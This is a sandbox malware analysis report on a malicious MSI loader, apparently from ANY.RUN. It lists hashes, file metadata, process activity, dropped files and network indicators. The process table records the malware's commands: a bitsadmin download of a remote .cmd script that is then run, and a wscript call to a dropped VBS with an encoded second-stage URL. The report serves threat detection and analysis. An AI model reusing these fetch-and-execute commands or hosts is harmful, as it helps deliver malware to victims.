download: | NFe-332595261652LBLX201MNSZSN28161.msi |
Full analysis: | https://app.any.run/tasks/6f2c9902-88d8-4da3-a654-8c3b928ec112 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 13, 2019, 15:39:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-msi |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {56A89770-E8FA-49A3-823D-A532438B4E6F}, Number of Words: 10, Subject: Install, Author: Free Java Software, Last Saved By: Chrome, Name of Creating Application: Advanced Installer 12.2.1 build 64247, Template: ;1033 |
MD5: | C96A76F3A8B0600535C4B9A99FE49F1D |
SHA1: | 19B55A192F8E8BE23072B585DA79BF34F9ACA560 |
SHA256: | F6B387087D3FFB2901A310572334EC0039BAFF9CFCD4D85AAE15743A54FEA113 |
SSDEEP: | 3072:flQRC9pM3DGY5ADwgz88ereWn/7w05g0+McB3RUN46ILJ9+ZB5yOan8R:flQSM3DGY5AC8er1nzTTrXR |
Extension | Identified type (score) |
---|---|
.msi | Microsoft Windows Installer (88.6)
.mst | Windows SDK Setup Transform Script (10)
.msi | Microsoft Installer (100)
Field | Value |
---|---|
Template | ;1033
Software | Advanced Installer 12.2.1 build 64247
LastModifiedBy | Chrome
Author | Free Java Software
Subject | Install
Words | 10
RevisionNumber | {56A89770-E8FA-49A3-823D-A532438B4E6F}
CodePage | Windows Latin 1 (Western European)
Security | None
Pages | 200
ModifyDate | 2009:12:11 11:47:44
CreateDate | 2009:12:11 11:47:44
LastPrinted | 2009:12:11 11:47:44
Comments | -
Keywords | Installer, MSI, Database
Title | Installation Database
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
2900 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Desktop\NFe-332595261652LBLX201MNSZSN28161.msi" | C:\Windows\System32\msiexec.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows® installer | 0 | 5.0.7600.16385 (win7_rtm.090713-1255)
2860 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe | SYSTEM | Microsoft Corporation | SYSTEM | Windows® installer | — | 5.0.7600.16385 (win7_rtm.090713-1255)
2444 | C:\Windows\system32\MsiExec.exe -Embedding 9F24321B53590E57DD54CFB79CB6962E | C:\Windows\system32\MsiExec.exe | — | msiexec.exe | admin | Microsoft Corporation | MEDIUM | Windows® installer | 0 | 5.0.7600.16385 (win7_rtm.090713-1255)
2732 | "C:\Windows\System32\cmd.exe" /C bitsadmin.exe /transfer "TGCTOQCBJUEFC" https://pumslins.s3.amazonaws.com/1308104651.cmd C:\Users\admin\COLVAGHKYQEEL.cmd | C:\Windows\System32\cmd.exe | — | MsiExec.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4092 | bitsadmin.exe /transfer "TGCTOQCBJUEFC" https://pumslins.s3.amazonaws.com/1308104651.cmd C:\Users\admin\COLVAGHKYQEEL.cmd | C:\Windows\system32\bitsadmin.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | BITS administration utility | 0 | 7.5.7600.16385 (win7_rtm.090713-1255)
3628 | cmd /c ""C:\Users\admin\COLVAGHKYQEEL.cmd" " | C:\Windows\system32\cmd.exe | — | MsiExec.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2552 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | TCP/IP Ping Command | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
2700 | wscript //Nologo "C:\ProgramData\windows\YYYqF\admin.vbs" AS111 https://poolgta.live/bibacham/aHR0cHM6Ly9kb2NzeDAxLnMzLXNhLWVhc3QtMS5hbWF6b25hd3MuY29tL2p1cGl0bG8xOHQucG5nJm5vLXBvd2Vy | C:\Windows\system32\wscript.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385
640 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows Explorer | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
3592 | "C:\Windows\System32\WScript.exe" "C:\ProgramData\windows\YYYqF\admin.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2860 | msiexec.exe | C:\Windows\Installer\MSICE37.tmp | — | — | —
2860 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFB33DAE4C32BD7006.TMP | — | — | —
2860 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFAB3C1918184DB4C5.TMP | — | — | —
2196 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | — | —
3628 | cmd.exe | C:\ProgramData\windows\YYYqF\admin.vbs | text | F953D0906D26CF266538AA770AEC8EFB | 5741535D8E3DFE882281EC7DA43F80E2ED8BE280A04B0F89DAE9BAA89BC858E5
2196 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
2860 | msiexec.exe | C:\Windows\Installer\36cbd5.msi | executable | C96A76F3A8B0600535C4B9A99FE49F1D | F6B387087D3FFB2901A310572334EC0039BAFF9CFCD4D85AAE15743A54FEA113
2860 | msiexec.exe | C:\Config.Msi\36cbd8.rbs | binary | F6764698EA6278702AB034CA54B041EA | 9C4C138740E224BF2F47213EDCC17D83BA1794AFF1027199C7C9B2AC148217E7
2860 | msiexec.exe | C:\Windows\Installer\MSICEF3.tmp | binary | AC018B7AE20D4FECAA1D70F725834CC8 | 22F9C2C28C0D35901DCB81959BBFA5AA4A3F4B0ADA28592679F39F72C1562E56
3648 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 5092C5FDAE78B553BB40C5B4DAC0EF77 | A49E890F0304B24C6C7B1E284F229898599683E87AAD1755F6568DD70C0274E8
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 72.247.178.16:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | NL | der | 1.37 Kb | whitelisted |
2196 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2196 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3240 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted |
— | — | 52.216.165.83:443 | pumslins.s3.amazonaws.com | Amazon.com, Inc. | US | unknown |
2700 | wscript.exe | 34.239.126.71:443 | poolgta.live | Amazon.com, Inc. | US | unknown |
3648 | iexplore.exe | 186.192.81.31:443 | g1.globo.com | Globo Comunicação e Participaçoes SA | BR | unknown |
— | — | 72.247.178.16:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | NL | whitelisted |
3648 | iexplore.exe | 172.217.16.130:443 | www.googletagservices.com | Google Inc. | US | whitelisted |
3648 | iexplore.exe | 186.192.91.5:443 | s.glbimg.com | Globo Comunicação e Participaçoes SA | BR | unknown |
3648 | iexplore.exe | 2.19.43.224:443 | sb.scorecardresearch.com | Akamai International B.V. | — | whitelisted |
3648 | iexplore.exe | 186.192.91.9:443 | s2.glbimg.com | Globo Comunicação e Participaçoes SA | BR | unknown |
Domain | IP | Reputation |
---|---|---|
pumslins.s3.amazonaws.com | | shared
poolgta.live | | unknown
edzz.la | | unknown
notepad-plus-plus.org | | whitelisted
isrg.trustid.ocsp.identrust.com | | whitelisted
www.bing.com | | whitelisted
gl.globo.com | | unknown
g1.globo.com | | unknown
s3.glbimg.com | | unknown
www.googletagservices.com | | whitelisted
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093